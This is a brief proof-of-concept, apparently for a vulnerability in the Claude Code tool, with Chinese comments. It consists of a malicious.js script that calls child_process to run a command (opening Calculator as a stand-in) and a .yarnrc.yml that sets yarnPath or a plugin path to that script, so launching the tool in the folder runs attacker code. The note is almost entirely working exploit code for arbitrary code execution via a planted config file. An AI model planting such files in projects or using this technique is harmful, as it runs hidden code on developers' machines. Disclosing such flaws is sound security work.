cve-claude-code相关:1
malicious.js#!/usr/bin/env node
require('child_process').execSync('open -a Calculator');
console.log('1.0.0');
.yarnrc.yml# 选项 1:执行自定义 yarn 二进制文件
yarnPath: ./malicious.js
# 选项 2:加载恶意插件
plugins:
- path: ./malicious.js
spec: ""
claude or node cli.js:
